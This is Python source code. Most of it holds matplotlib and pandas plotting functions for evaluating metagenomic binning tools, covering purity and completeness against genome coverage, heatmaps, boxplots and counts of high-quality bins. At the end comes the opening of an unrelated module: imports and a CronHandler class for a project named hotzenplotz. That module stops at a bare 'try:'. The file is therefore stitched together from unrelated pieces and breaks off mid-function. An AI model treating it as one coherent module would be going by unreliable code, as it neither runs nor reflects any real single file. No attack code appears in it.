def plot_by_genome_coverage(pd_bins, pd_target_column, available_tools, output_dir):
    """Scatter pd_target_column ('precision_bp' or recall) against genome
    coverage, one color per tool, plus a per-tool rolling-mean curve.
    Saves a PDF to <output_dir>/genome/."""
    colors_list = create_colors_list()
    if len(available_tools) > len(colors_list):
        raise RuntimeError("Plot only supports 29 colors")

    fig, axs = plt.subplots(figsize=(5, 4.5))

    for i, (color, tool) in enumerate(zip(colors_list, available_tools)):
        # Sort by genome_index so the rolling-mean line is drawn in order.
        pd_tool = pd_bins[pd_bins[utils_labels.TOOL] == tool].sort_values(by=['genome_index'])
        axs.scatter(pd_tool['genome_coverage'], pd_tool[pd_target_column], marker='o', color=colors_list[i], s=[3] * pd_tool.shape[0])
        window = 50
        # Smooth the metric over a 50-point window (needs >= 10 points).
        rolling_mean = pd_tool[pd_target_column].rolling(window=window, min_periods=10).mean()
        axs.plot(pd_tool['genome_coverage'], rolling_mean, color=colors_list[i])

    axs.set_ylim([-0.01, 1.01])

    # 'genome_coverage' is log-transformed by the caller, so relabel the
    # x ticks with the un-logged coverage; y ticks become percentages.
    # NOTE(review): set_*ticklabels reads the current tick positions --
    # assumes the tick locations are final at this point; confirm.
    axs.set_xticklabels(['{:,.1f}'.format(np.exp(x)) for x in axs.get_xticks()], fontsize=12)
    axs.set_yticklabels(['{:3.0f}'.format(x * 100) for x in axs.get_yticks()], fontsize=12)

    axs.tick_params(axis='x', labelsize=12)

    # Axis label and output file name depend on the plotted metric.
    if pd_target_column == 'precision_bp':
        ylabel = 'Purity per bin (%)'
        file_name = 'purity_by_genome_coverage'
    else:
        ylabel = 'Completeness per genome (%)'
        file_name = 'completeness_by_genome_coverage'

    plt.ylabel(ylabel, fontsize=15)
    plt.xlabel('Average genome coverage', fontsize=15)

    # Legend with one colored marker per tool, placed outside the axes.
    colors_iter = iter(colors_list)
    circles = []
    for x in range(len(available_tools)):
        circles.append(Line2D([], [], markeredgewidth=0.0, linestyle="None", marker="o", markersize=11, markerfacecolor=next(colors_iter)))
    lgd = plt.legend(circles, available_tools, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., handlelength=0, frameon=False, fontsize=14)

    fig.savefig(os.path.join(output_dir, 'genome', file_name + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
    plt.close(fig)


def get_pd_genomes_recall(sample_id_to_queries_list):
    """Collect per-genome recall_bp of every GenomeQuery into one
    DataFrame indexed by (sample_id, tool label)."""
    pd_genomes_recall = pd.DataFrame()
    for sample_id, queries in sample_id_to_queries_list.items():
        for query in queries:
            # Only genome-binning queries carry a recall_df_cami1.
            if not isinstance(query, binning_classes.GenomeQuery):
                continue
            df = query.recall_df_cami1[['genome_id', 'recall_bp']].copy()
            df[utils_labels.TOOL] = query.label
            df['sample_id'] = sample_id
            df = df.reset_index().set_index(['sample_id', utils_labels.TOOL])
            pd_genomes_recall = pd.concat([pd_genomes_recall, df])
    return pd_genomes_recall


def plot_precision_recall_by_coverage(sample_id_to_queries_list, pd_bins_g, coverages_pd, available_tools, output_dir):
    """Plot per-genome completeness and per-bin purity against average
    genome coverage.

    :param sample_id_to_queries_list: dict mapping sample id -> queries
    :param pd_bins_g: per-bin DataFrame with precision_bp and genome_id
    :param coverages_pd: DataFrame with GENOMEID and COVERAGE columns
    :param available_tools: tool labels to plot
    :param output_dir: base output directory
    """
    # Compute average genome coverage if coverages for multiple samples
    # were provided; GENOMEID becomes the index of the aggregated frame.
    coverages_pd = coverages_pd.groupby(['GENOMEID']).mean()
    # NOTE: a former `coverages_pd.rename(columns={'GENOMEID': 'genome_id'})`
    # call here was a no-op (its result was discarded, and GENOMEID is the
    # index -- not a column -- after the groupby), so it has been removed.
    coverages_pd = coverages_pd.sort_values(by=['COVERAGE'])
    coverages_pd['rank'] = coverages_pd['COVERAGE'].rank()

    # Completeness (recall) per genome vs. coverage.
    pd_genomes_recall = get_pd_genomes_recall(sample_id_to_queries_list)
    # Map genome ids (the index of coverages_pd) to rank and log-coverage.
    pd_genomes_recall['genome_index'] = pd_genomes_recall['genome_id'].map(coverages_pd['rank'].to_dict())
    pd_genomes_recall = pd_genomes_recall.reset_index()
    pd_genomes_recall['genome_coverage'] = np.log(pd_genomes_recall['genome_id'].map(coverages_pd['COVERAGE'].to_dict()))
    plot_by_genome_coverage(pd_genomes_recall, 'recall_bp', available_tools, output_dir)

    # Purity (precision) per bin vs. coverage of the bin's mapped genome.
    pd_bins_precision = pd_bins_g[[utils_labels.TOOL, 'precision_bp', 'genome_id']].copy().dropna(subset=['precision_bp'])
    pd_bins_precision['genome_index'] = pd_bins_precision['genome_id'].map(coverages_pd['rank'].to_dict())
    pd_bins_precision['genome_coverage'] = np.log(pd_bins_precision['genome_id'].map(coverages_pd['COVERAGE'].to_dict()))
    plot_by_genome_coverage(pd_bins_precision, 'precision_bp', available_tools, output_dir)


def plot_heatmap(df_confusion, sample_id, output_dir, label, separate_bar=False, log_scale=False):
    """Render a genomes-by-bins confusion-matrix heatmap for one sample
    and save it (PDF + PNG) to <output_dir>/genome/<label>/.

    :param df_confusion: confusion matrix (bins x genomes) of base pairs
    :param sample_id: sample identifier, used in the output file names
    :param output_dir: base output directory
    :param label: tool label; both plot title and output subdirectory
    :param separate_bar: if True, additionally save a standalone colorbar
    :param log_scale: if True, plot log10 of the values
    """
    if log_scale:
        # NOTE(review): 'inplace' is not a valid kwarg for np.log10 via
        # DataFrame.apply -- presumably ignored by this pandas version;
        # verify. log10(0) == -inf cells are reset to 0 for plotting.
        df_confusion = df_confusion.apply(np.log10, inplace=True).replace(-np.inf, 0)
    fig, axs = plt.subplots(figsize=(10, 8))
    fontsize = 20

    # replace columns and rows labels by numbers
    d = {value: key for (key, value) in enumerate(df_confusion.columns.tolist(), 1)}
    df_confusion = df_confusion.rename(index=str, columns=d)
    df_confusion.index = range(1, len(df_confusion) + 1)

    # Show roughly every tenth tick label (rounded to a multiple of 10).
    xticklabels = int(round(df_confusion.shape[1] / 10, -1))
    yticklabels = int(round(df_confusion.shape[0] / 10, -1))
    sns_plot = sns.heatmap(df_confusion, ax=axs, annot=False, cmap="YlGnBu_r", xticklabels=xticklabels, yticklabels=yticklabels, cbar=False, rasterized=True)

    # sns_plot = sns.heatmap(df_confusion, ax=axs, annot=False, cmap="YlGnBu_r", xticklabels=False, yticklabels=False, cbar=True, rasterized=True)
    sns_plot.set_xlabel("Genomes", fontsize=fontsize)
    sns_plot.set_ylabel("Predicted bins", fontsize=fontsize)
    plt.yticks(fontsize=12, rotation=0)
    plt.xticks(fontsize=12)

    # Reuse the heatmap's color mapping for a manually placed colorbar.
    mappable = sns_plot.get_children()[0]

    cbar_ax = fig.add_axes([.915, .11, .017, .77])
    cbar = plt.colorbar(mappable, ax=axs, cax=cbar_ax, orientation='vertical')
    if log_scale:
        cbar.set_label(fontsize=fontsize, label='log$_{10}$(# bp)')
    else:
        # Label the colorbar in millions of base pairs.
        fmt = lambda x, pos: '{:.0f}'.format(x / 1000000)
        cbar = plt.colorbar(mappable, ax=axs, cax=cbar_ax, orientation='vertical', format=ticker.FuncFormatter(fmt))
        cbar.set_label(fontsize=fontsize, label='Millions of base pairs')

    cbar.ax.tick_params(labelsize=fontsize)
    cbar.outline.set_edgecolor(None)

    axs.set_title(label, fontsize=fontsize, pad=10)

    axs.set_ylim([len(df_confusion), 0])

    # plt.yticks(fontsize=14, rotation=0)
    # plt.xticks(fontsize=14)

    output_dir = os.path.join(output_dir, 'genome', label)

    fig.savefig(os.path.join(output_dir, 'heatmap_' + sample_id + '.pdf'), dpi=100, format='pdf', bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, 'heatmap_' + sample_id + '.png'), dpi=200, format='png', bbox_inches='tight')
    plt.close(fig)

    if not separate_bar:
        return

    # create separate figure for bar
    fig = plt.figure(figsize=(6, 6))
    mappable = sns_plot.get_children()[0]
    fmt = lambda x, pos: '{:.0f}'.format(x / 1000000)

    cbar = plt.colorbar(mappable, orientation='vertical', label='[millions of base pairs]', format=ticker.FuncFormatter(fmt))

    text = cbar.ax.yaxis.label
    font = matplotlib.font_manager.FontProperties(size=16)
    text.set_font_properties(font)

    cbar.outline.set_visible(False)
    cbar.ax.tick_params(labelsize=14)

    # store separate bar figure
    plt.gca().set_visible(False)
    fig.savefig(os.path.join(output_dir, 'heatmap_bar.pdf'), dpi=100, format='pdf', bbox_inches='tight')

    plt.close(fig)


def plot_boxplot(sample_id_to_queries_list, metric_name, output_dir, available_tools):
    """Draw a horizontal boxplot of a per-bin metric across all samples,
    one box per tool, saved to <output_dir>/genome/ (PDF + PNG).

    :param sample_id_to_queries_list: dict mapping sample id -> queries
    :param metric_name: 'precision_bp' or 'recall_bp'
    :param output_dir: base output directory
    :param available_tools: tool labels, one box per tool
    """
    # Gather the per-bin metric DataFrames of all queries of all samples,
    # indexed by (sample_id, tool label).
    pd_bins = pd.DataFrame()
    for sample_id in sample_id_to_queries_list:
        for query in sample_id_to_queries_list[sample_id]:
            # e.g. 'precision_bp' -> attribute 'precision_df'.
            metric_df = getattr(query, metric_name.replace('_bp', '_df')).copy()
            metric_df[utils_labels.TOOL] = query.label
            metric_df['sample_id'] = sample_id
            metric_df = metric_df.reset_index().set_index(['sample_id', utils_labels.TOOL])
            pd_bins = pd.concat([pd_bins, metric_df])

    # One list of non-null metric values per tool, in tool order.
    metric_all = []

    for tool in available_tools:
        pd_tool = pd_bins.iloc[pd_bins.index.get_level_values(utils_labels.TOOL) == tool]
        metric_all.append(pd_tool[metric_name][pd_tool[metric_name].notnull()].tolist())

    fig, axs = plt.subplots(figsize=(6, 5))

    medianprops = dict(linewidth=2.5, color='gold')
    bplot = axs.boxplot(metric_all, notch=0, vert=0, patch_artist=True, labels=available_tools, medianprops=medianprops, sym='k.')
    colors_iter = iter(create_colors_list())

    # turn on grid
    axs.grid(which='major', linestyle=':', linewidth='0.5', color='lightgrey')

    # force axes to be from 0 to 100%
    axs.set_xlim([-0.01, 1.01])

    # transform plot_labels to percentages
    vals = axs.get_xticks()
    axs.set_xticklabels(['{:3.0f}'.format(x * 100) for x in vals])

    # enable code to rotate labels
    tick_labels = axs.get_yticklabels()
    plt.setp(tick_labels, fontsize=13) ## rotation=55

    # Color each tool's box with the shared palette; flip the y axis so
    # the first tool appears at the top.
    for box in bplot['boxes']:
        box.set(facecolor=next(colors_iter), linewidth=0.1)
    plt.ylim(plt.ylim()[::-1])

    # Label the axis and pick the output file name from the metric.
    if metric_name == 'precision_bp':
        axs.set_xlabel('Purity per bin (%)', fontsize=13)
        metric_name = 'purity_bp'
    else:
        axs.set_xlabel('Completeness per genome (%)', fontsize=13)
        metric_name = 'completeness_bp'

    fig.savefig(os.path.join(output_dir, 'genome', 'boxplot_' + metric_name + '.pdf'), dpi=100, format='pdf', bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, 'genome', 'boxplot_' + metric_name + '.png'), dpi=200, format='png', bbox_inches='tight')

    # remove labels but keep grid
    # axs.get_yaxis().set_ticklabels([])
    # for tic in axs.yaxis.get_major_ticks():
    #     tic.tick1line.set_visible(False)
    #     tic.tick2line.set_visible(False)
    #     tic.label1.set_visible(False)
    #     tic.label2.set_visible(False)
    # fig.savefig(os.path.join(output_dir, 'genome', 'boxplot_' + metric_name + '_wo_legend.pdf'), dpi=100, format='pdf', bbox_inches='tight')
    plt.close(fig)


def plot_summary(color_indices, df_results, labels, output_dir, rank, plot_type, file_name, xlabel, ylabel):
    """Render one summary scatter/errorbar plot comparing binning tools.

    Parameters:
        color_indices: optional list of indices selecting colors from
            create_colors_list(); falsy means use the palette in order.
        df_results: per-tool results with utils_labels.TOOL and
            utils_labels.BINNING_TYPE columns plus the metric columns
            required by the chosen plot_type.
        labels: tool names in the desired plot/legend order.
        output_dir: base directory; files are written to
            <output_dir>/<binning_type>/.
        rank: optional taxonomic rank; when set it prefixes the file name,
            becomes the plot title, and 'genome' in ylabel becomes 'taxon'.
        plot_type: 'e'/'f' = errorbar of avg purity vs completeness (bp/seq),
            'w'/'x' = sample-wise purity vs completeness (bp/seq),
            'p' = adjusted Rand index vs percentage of assigned bps.
        file_name: output file stem (without extension).
        xlabel, ylabel: axis labels.

    Saves .eps (without legend), then .pdf and .png (with legend) and
    closes the figure.
    """
    available_tools = df_results[utils_labels.TOOL].unique()
    # Keep only tools present in the results, preserving `labels` order.
    tools = [tool for tool in labels if tool in available_tools]

    colors_list = create_colors_list()
    if color_indices:
        colors_list = [colors_list[i] for i in color_indices]
    # One row of per-column means per tool, reordered to match `tools`.
    df_mean = df_results.groupby(utils_labels.TOOL).mean().reindex(tools)

    binning_type = df_results[utils_labels.BINNING_TYPE].iloc[0]

    if len(df_mean) > len(colors_list):
        raise RuntimeError("Plot only supports 29 colors")

    fig, axs = plt.subplots(figsize=(5, 4.5))

    # force axes to be from 0 to 100%
    axs.set_xlim([0.0, 1.0])
    axs.set_ylim([0.0, 1.0])

    # NOTE(review): 'e', 'f' and 'w' are independent ifs while 'x'/'p'
    # share an if/elif; with the literal plot_type values passed by the
    # wrappers below, exactly one branch draws per call — confirm if new
    # plot types are added.
    # 'e' mixes utils_labels constants with hard-coded '*_var' column
    # names, unlike 'f' — presumably intentional; verify against the
    # columns produced upstream.
    if plot_type == 'e':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.errorbar(df_row[utils_labels.AVG_PRECISION_BP], df_row[utils_labels.AVG_RECALL_BP], xerr=df_row['avg_precision_bp_var'], yerr=df_row['avg_recall_bp_var'],
                         fmt='o',
                         ecolor=colors_list[i],
                         mec=colors_list[i],
                         mfc=colors_list[i],
                         capsize=3,
                         markersize=8)
    if plot_type == 'f':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.errorbar(df_row[utils_labels.AVG_PRECISION_SEQ], df_row[utils_labels.AVG_RECALL_SEQ], xerr=df_row[utils_labels.AVG_PRECISION_SEQ_SEM], yerr=df_row[utils_labels.AVG_RECALL_SEQ_SEM],
                         fmt='o',
                         ecolor=colors_list[i],
                         mec=colors_list[i],
                         mfc=colors_list[i],
                         capsize=3,
                         markersize=8)
    if plot_type == 'w':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.plot(df_row[utils_labels.PRECISION_PER_BP], df_row[utils_labels.RECALL_PER_BP], marker='o', color=colors_list[i], markersize=10)
    if plot_type == 'x':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.plot(df_row[utils_labels.PRECISION_PER_SEQ], df_row[utils_labels.RECALL_PER_SEQ], marker='o', color=colors_list[i], markersize=10)
    elif plot_type == 'p':
        for i, (tool, df_row) in enumerate(df_mean.iterrows()):
            axs.plot(df_row[utils_labels.ARI_BY_BP], df_row[utils_labels.PERCENTAGE_ASSIGNED_BPS], marker='o', color=colors_list[i], markersize=10)

    # turn on grid
    # axs.minorticks_on()
    axs.grid(which='major', linestyle=':', linewidth='0.5')
    # axs.grid(which='minor', linestyle=':', linewidth='0.5')

    # transform plot_labels to percentages (ARI on the x axis of 'p' plots
    # is not a percentage, so it keeps its raw tick labels)
    if plot_type != 'p':
        vals = axs.get_xticks()
        axs.set_xticklabels(['{:3.0f}'.format(x * 100) for x in vals], fontsize=11)
    else:
        axs.tick_params(axis='x', labelsize=12)
    vals = axs.get_yticks()
    axs.set_yticklabels(['{:3.0f}'.format(x * 100) for x in vals], fontsize=11)

    if rank:
        file_name = rank + '_' + file_name
        plt.title(rank)
        ylabel = ylabel.replace('genome', 'taxon')

    plt.xlabel(xlabel, fontsize=13)
    plt.ylabel(ylabel, fontsize=13)
    plt.tight_layout()
    # .eps is saved before the legend is added, so it has no legend.
    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.eps'), dpi=100, format='eps', bbox_inches='tight')

    # Build a proxy-artist legend: one colored circle per tool.
    colors_iter = iter(colors_list)
    circles = []
    for x in range(len(df_mean)):
        circles.append(Line2D([], [], markeredgewidth=0.0, linestyle="None", marker="o", markersize=11, markerfacecolor=next(colors_iter)))
    lgd = plt.legend(circles, tools, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., handlelength=0, frameon=False, fontsize=12)

    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.png'), dpi=200, format='png', bbox_extra_artists=(lgd,), bbox_inches='tight')
    plt.close(fig)


def plot_avg_precision_recall(colors, df_results, labels, output_dir, rank=None):
    """Plot average purity vs. completeness, once per base pair and once per sequence."""
    shared = (colors, df_results, labels, output_dir, rank)
    axis_labels = ('Average purity per bin (%)',
                   'Average completeness per genome (%)')
    plot_summary(*shared, 'e', 'avg_purity_completeness_bp', *axis_labels)
    plot_summary(*shared, 'f', 'avg_purity_completeness_seq', *axis_labels)


def plot_precision_recall(colors, summary_per_query, labels, output_dir, rank=None):
    """Plot sample-wise purity vs. completeness, once per base pair and once per sequence."""
    shared = (colors, summary_per_query, labels, output_dir, rank)
    axis_labels = ('Purity for sample (%)', 'Completeness for sample (%)')
    plot_summary(*shared, 'w', 'purity_recall_bp', *axis_labels)
    plot_summary(*shared, 'x', 'purity_completeness_seq', *axis_labels)


def plot_adjusted_rand_index_vs_assigned_bps(colors, summary_per_query, labels, output_dir, rank=None):
    """Plot adjusted Rand index against the percentage of binned base pairs."""
    plot_summary(colors, summary_per_query, labels, output_dir, rank,
                 'p', 'ari_vs_assigned_bps',
                 'Adjusted Rand index', 'Percentage of binned base pairs')


def plot_taxonomic_results(df_summary_t, metrics_list, errors_list, file_name, output_dir):
    """Plot metric values across taxonomic ranks, one figure per tool.

    For every tool in df_summary_t, draws one line per metric in
    metrics_list over load_ncbi_taxinfo.RANKS and shades +/- the matching
    error column from errors_list around it (errors_list[i] belongs to
    metrics_list[i]). Missing values (NaN) are plotted as 0.
    Saves <output_dir>/taxonomic/<tool>/<file_name>.png and .pdf.
    """
    # Fixed palette: one color per metric (supports up to 4 metrics).
    colors_list = ["#006cba", "#008000", "#ba9e00", "red"]

    for tool, pd_results in df_summary_t.groupby(utils_labels.TOOL):
        # One rank->value mapping per metric, initialized to 0 for every rank
        # so ranks absent from the results still get a point.
        dict_metric_list = []
        for metric in metrics_list:
            rank_to_metric = OrderedDict([(k, .0) for k in load_ncbi_taxinfo.RANKS])
            dict_metric_list.append(rank_to_metric)
        dict_error_list = []
        for error in errors_list:
            rank_to_metric_error = OrderedDict([(k, .0) for k in load_ncbi_taxinfo.RANKS])
            dict_error_list.append(rank_to_metric_error)

        # Fill the mappings from the per-rank rows; NaNs become 0.
        for index, row in pd_results.iterrows():
            for rank_to_metric, metric in zip(dict_metric_list, metrics_list):
                rank_to_metric[row[utils_labels.RANK]] = .0 if np.isnan(row[metric]) else row[metric]
            for rank_to_metric_error, error in zip(dict_error_list, errors_list):
                rank_to_metric_error[row[utils_labels.RANK]] = .0 if np.isnan(row[error]) else row[error]

        fig, axs = plt.subplots(figsize=(6, 5))

        # force axes to be from 0 to 100%
        axs.set_xlim([0, 7])
        axs.set_ylim([0.0, 1.0])
        # One x position per rank, in RANKS order.
        x_values = range(len(load_ncbi_taxinfo.RANKS))

        y_values_list = []
        for rank_to_metric, color in zip(dict_metric_list, colors_list):
            y_values = list(rank_to_metric.values())
            axs.plot(x_values, y_values, color=color)
            y_values_list.append(y_values)

        # Shade the error band (value +/- error) in the line's color.
        for rank_to_metric_error, y_values, color in zip(dict_error_list, y_values_list, colors_list):
            sem = list(rank_to_metric_error.values())
            plt.fill_between(x_values, np.subtract(y_values, sem).tolist(), np.add(y_values, sem).tolist(), color=color, alpha=0.5)

        plt.xticks(x_values, load_ncbi_taxinfo.RANKS, rotation='vertical')

        # Show y ticks as percentages.
        vals = axs.get_yticks()
        axs.set_yticklabels(['{:3.0f}%'.format(x * 100) for x in vals])

        lgd = plt.legend(metrics_list, loc=1, borderaxespad=0., handlelength=2, frameon=False)

        plt.tight_layout()
        fig.savefig(os.path.join(output_dir, 'taxonomic', tool, file_name + '.png'), dpi=100, format='png', bbox_extra_artists=(lgd,), bbox_inches='tight')
        fig.savefig(os.path.join(output_dir, 'taxonomic', tool, file_name + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
        plt.close(fig)


def create_contamination_column(pd_tool_bins):
    """Add a 'newcolumn' holding the contamination, i.e. 1 - purity (precision_bp).

    Mutates pd_tool_bins in place; NaN purity yields NaN contamination.
    """
    pd_tool_bins['newcolumn'] = pd_tool_bins['precision_bp'].rsub(1)


def create_completeness_minus_contamination_column(pd_tool_bins):
    """Add 'newcolumn' = completeness - contamination = recall_bp + precision_bp - 1.

    Mutates pd_tool_bins in place; NaN in either input propagates to the result.
    """
    score = pd_tool_bins['recall_bp'].add(pd_tool_bins['precision_bp']).sub(1)
    pd_tool_bins['newcolumn'] = score


def plot_contamination(pd_bins, binning_type, title, xlabel, ylabel, create_column_function, output_dir):
    """Plot a per-tool curve of a derived bin metric, sorted descending.

    create_column_function must add a 'newcolumn' to a DataFrame holding
    utils_labels.TOOL, 'precision_bp' and 'recall_bp' (see
    create_contamination_column / create_completeness_minus_contamination_column).
    Each tool's bins are sorted by that column (best first) and plotted
    against their rank. The file name is derived from `title`.
    Saves <output_dir>/<binning_type>/<file_name>.png and .pdf.
    """
    if len(pd_bins) == 0:
        return

    # Work on a copy with only the needed columns; bins without purity are dropped.
    pd_bins_copy = pd_bins[[utils_labels.TOOL, 'precision_bp', 'recall_bp']].copy().dropna(subset=['precision_bp'])
    create_column_function(pd_bins_copy)

    colors_list = create_colors_list()

    fig, axs = plt.subplots(figsize=(6, 5))

    tools = pd_bins_copy[utils_labels.TOOL].unique().tolist()

    for color, tool in zip(colors_list, tools):
        pd_tool_bins = pd_bins_copy[pd_bins_copy[utils_labels.TOOL] == tool]
        # Sort descending so the curve decreases from left to right.
        pd_tool_bins = pd_tool_bins.sort_values(by='newcolumn', ascending=False).reset_index()
        pd_tool_bins = pd_tool_bins.drop(['index'], axis=1)

        # x axis = 1-based bin rank, y axis = the derived metric.
        axs.plot(list(range(1, len(pd_tool_bins) + 1)), pd_tool_bins['newcolumn'], color=color)

    # Start the y axis at the worst observed value (or 0.9 when everything is >= 1.0).
    min_value = pd_bins_copy['newcolumn'].min()
    axs.set_ylim(min_value if min_value < 1.0 else .9, 1.0)
    axs.set_xlim(1, None)
    axs.grid(which='major', linestyle='-', linewidth='0.5', color='lightgrey')

    # transform plot_labels to percentages
    vals = axs.get_yticks()
    axs.set_yticklabels(['{:3.0f}'.format(y * 100) for y in vals])

    plt.xlabel(xlabel, fontsize=14)
    plt.ylabel(ylabel + ' [%]', fontsize=14)

    lgd = plt.legend(tools, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., handlelength=1, frameon=False, fontsize=12)

    plt.tight_layout()

    # e.g. "Completeness - contamination | genome" -> "completeness_minus_contamination__genome"
    file_name = title.lower().replace(' ', '_').replace('-', 'minus').replace('|', '')
    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.png'), dpi=100, format='png', bbox_extra_artists=(lgd,), bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, binning_type, file_name + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
    plt.close(fig)


def get_number_of_hq_bins(tools, pd_bins):
    """Count high-quality bins per tool at three completeness thresholds.

    A bin counts as high quality when its purity (precision_bp) exceeds 0.9
    and its completeness (recall_bp) exceeds 0.9, 0.7 or 0.5 respectively.
    The thresholds are cumulative (a '>90%' bin is also counted in '>70%'
    and '>50%'), matching the original behavior.

    :param tools: iterable of tool names (rows of the result, in order)
    :param pd_bins: DataFrame with utils_labels.TOOL, 'precision_bp' and
        'recall_bp' columns; rows with NaN purity are ignored
    :return: DataFrame indexed by tool with columns '>90%', '>70%', '>50%'
    """
    pd_bins_copy = pd_bins[[utils_labels.TOOL, 'precision_bp', 'recall_bp']].copy().dropna(subset=['precision_bp'])
    counts_per_tool = []
    for tool in tools:
        pd_tool_bins = pd_bins_copy[pd_bins_copy[utils_labels.TOOL] == tool]
        # Filter by purity once, then by each completeness threshold.
        hq = pd_tool_bins[pd_tool_bins['precision_bp'] > .9]
        x50 = hq[hq['recall_bp'] > .5].shape[0]
        x70 = hq[hq['recall_bp'] > .7].shape[0]
        x90 = hq[hq['recall_bp'] > .9].shape[0]
        counts_per_tool.append(pd.DataFrame([[x90, x70, x50]], columns=['>90%', '>70%', '>50%'], index=[tool]))
    # DataFrame.append was deprecated in pandas 1.4 and removed in 2.0;
    # collect the per-tool frames and concatenate once instead.
    return pd.concat(counts_per_tool) if counts_per_tool else pd.DataFrame()


def get_number_of_hq_bins_by_score(tools, pd_bins):
    """Count bins per tool in three disjoint buckets of a combined quality score.

    The score is completeness minus a 5x penalty on contamination:
    recall_bp + 5 * (precision_bp - 1). Unlike get_number_of_hq_bins, the
    buckets are made disjoint: '>70' excludes bins already counted in '>90',
    and '>50' excludes '>70' and '>90' (so stacked bars sum correctly).

    :param tools: iterable of tool names (rows of the result, in order)
    :param pd_bins: DataFrame with utils_labels.TOOL, 'precision_bp' and
        'recall_bp' columns; rows with NaN purity are ignored
    :return: DataFrame indexed by tool with columns '>90', '>70', '>50'
    """
    pd_bins_copy = pd_bins[[utils_labels.TOOL, 'precision_bp', 'recall_bp']].copy().dropna(subset=['precision_bp'])
    pd_bins_copy['newcolumn'] = pd_bins_copy['recall_bp'] + 5 * (pd_bins_copy['precision_bp'] - 1)
    counts_per_tool = []
    for tool in tools:
        pd_tool_bins = pd_bins_copy[pd_bins_copy[utils_labels.TOOL] == tool]
        x50 = pd_tool_bins[pd_tool_bins['newcolumn'] > .5].shape[0]
        x70 = pd_tool_bins[pd_tool_bins['newcolumn'] > .7].shape[0]
        x90 = pd_tool_bins[pd_tool_bins['newcolumn'] > .9].shape[0]
        # Make the buckets disjoint for stacked plotting.
        x50 -= x70
        x70 -= x90
        counts_per_tool.append(pd.DataFrame([[x90, x70, x50]], columns=['>90', '>70', '>50'], index=[tool]))
    # DataFrame.append was deprecated in pandas 1.4 and removed in 2.0;
    # collect the per-tool frames and concatenate once instead.
    return pd.concat(counts_per_tool) if counts_per_tool else pd.DataFrame()


def plot_counts(pd_bins, tools, output_dir, output_file, get_bin_counts_function):
    """Plot per-tool bin counts as a (possibly stacked) bar chart.

    get_bin_counts_function(tools, pd_bins) must return a DataFrame indexed
    by tool with three count columns (see get_number_of_hq_bins /
    get_number_of_hq_bins_by_score). When output_file == 'bin_counts' the
    bars are grouped; otherwise they are stacked and annotated with totals.
    Saves <output_dir>/genome/<output_file>.pdf and .png.
    """
    pd_counts = get_bin_counts_function(tools, pd_bins)
    fig, axs = plt.subplots(figsize=(11, 5))
    if output_file == 'bin_counts':
        fig = pd_counts.plot.bar(ax=axs, stacked=False, color=['#28334AFF', '#FBDE44FF', '#F65058FF'], width=.8, legend=None).get_figure()
    else:
        fig = pd_counts.plot.bar(ax=axs, stacked=True, color=['#9B4A97FF', '#FC766AFF', '#F9A12EFF'], width=.8, legend=None).get_figure()

    axs.tick_params(axis='x', labelrotation=45, length=0)
    axs.set_xticklabels(tools, horizontalalignment='right', fontsize=14)
    axs.set_xlabel(None)

    # axs.yaxis.set_major_locator(MaxNLocator(integer=True))

    h, l = axs.get_legend_handles_labels()
    axs.set_ylabel('#genome bins', fontsize=14)

    # axs.grid(which='major', linestyle=':', linewidth='0.5')
    # axs.grid(which='minor', linestyle=':', linewidth='0.5')

    # Invisible proxy handle so the legend starts with a text-only entry.
    ph = [plt.plot([], marker='', ls='')[0]]
    handles = ph + h

    if output_file == 'bin_counts':
        labels = ['Contamination < 10%           Completeness  '] + l
        bbox_to_anchor = (0.49, 1.02)
    else:
        labels = ['Score  '] + l
        # Annotate each stacked bar with its total count.
        # NOTE(review): assumes the count columns are named '>90', '>70',
        # '>50' (i.e. get_number_of_hq_bins_by_score was used) — confirm
        # for any other count function.
        y_values = (pd_counts['>90'] + pd_counts['>70'] + pd_counts['>50']).tolist()
        for i, v in enumerate(y_values):
            axs.text(i - .25, v + 5, str(v), color='black', fontweight='bold')
        bbox_to_anchor = (0.47, 1.02)

    lgd = plt.legend(handles, labels, bbox_to_anchor=bbox_to_anchor, columnspacing=.5, loc=8, borderaxespad=0., handlelength=1, frameon=False, fontsize=14, ncol=5)

    # plt.subplots_adjust(hspace=0.6, wspace=0.2)

    fig.savefig(os.path.join(output_dir, 'genome', output_file + '.pdf'), dpi=100, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight')
    fig.savefig(os.path.join(output_dir, 'genome', output_file + '.png'), dpi=200, format='png', bbox_extra_artists=(lgd,), bbox_inches='tight')
    plt.close(fig)

import os
import datetime

from jinja2 import Environment,PackageLoader,TemplateNotFound
from hotzenplotz.openstack.common import cfg
from hotzenplotz.openstack.common import log as logging
from hotzenplotz.openstack.common import utils

from hotzenplotz.common import exception
from hotzenplotz.api import validator


LOG = logging.getLogger(__name__)

class CronHandler(object):
    """Handler for the Cron resource.

    Renders cron puppet manifests from a jinja2 template and reacts to
    create/update/delete requests dispatched through do_config().
    """

    def __init__(self, **kwargs):
        # The 'cron' template ships inside the hotzenplotz.worker package.
        env = Environment(loader=PackageLoader('hotzenplotz.worker', 'templates'))
        self.template = env.get_template('cron')
        # Target directory for generated cron files; defaulted lazily in
        # _create_cron so tests can inject their own path first.
        self.dir_path = None

    # @utils.synchronized('haproxy')
    def do_config(self, request):
        """Validate `request` and dispatch to the matching cron operation.

        :param request: dict with 'method' (one of 'create_cron',
            'delete_cron', 'update_cron') and a 'cron_resource' payload
        :raises exception.CronConfigureError: on validation failure or when
            the dispatched operation fails
        """
        try:
